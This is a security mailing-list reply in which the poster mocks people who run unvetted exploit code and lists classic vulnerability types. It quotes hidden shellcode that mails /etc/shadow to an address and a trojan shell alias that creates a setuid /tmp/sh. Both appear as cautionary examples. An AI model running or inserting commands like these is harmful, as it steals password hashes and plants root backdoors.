Yesterday, Matt Lewis wrote:
> How did this get approved, did anyone test it or review it?

and today, Brett Eldridge pointed out:

> i don't think that the moderator's job is to test all the exploits that
> get mailed to the list.
[...]
> that said, anybody who blindly uses exploit code deserves what they get.
> next time, test the code in a controlled environment.

This is just history repeating itself. Remember that 'sshd exploit
code' someone posted here about 2-3 years back? For some reason you
*had* to run it as root. Buried in its shellcode was a very simple
'mailx [EMAIL PROTECTED] < /etc/shadow'. This is just old news and
new kiddies thinking they're being special by playing with old tricks.

If you run code without looking at it or thinking it through, "Boo Hoo!"

Show me something new and exciting.

Security hasn't changed much:
[1] Backdoors/easter-eggs (Sendmail 3.x 'WIZ'->Borland Inprise)
[2] buffer overflows (fingerd->statd->imapd)
[3] race conditions and a lack of randomness (think /tmp, TCP sequencing)
[4] permissions (Remember when SunOS and Solaris installed with a mode 666
    /var/adm/messages? Various distros of Linux did the same 3 years later
    with its syslogs.)
[5] trojans (alias mroe='cp /bin/sh /tmp/sh; chmod 04755 /tmp/sh')

-Jon
--
Jonathan Katz [] [EMAIL PROTECTED] [] http://jonworld.com
"Live fast, die young, leave a really messy corpse."
Cell: 317-698-4023 [] Pager: 800-759-8888 1770869 aka [EMAIL PROTECTED]
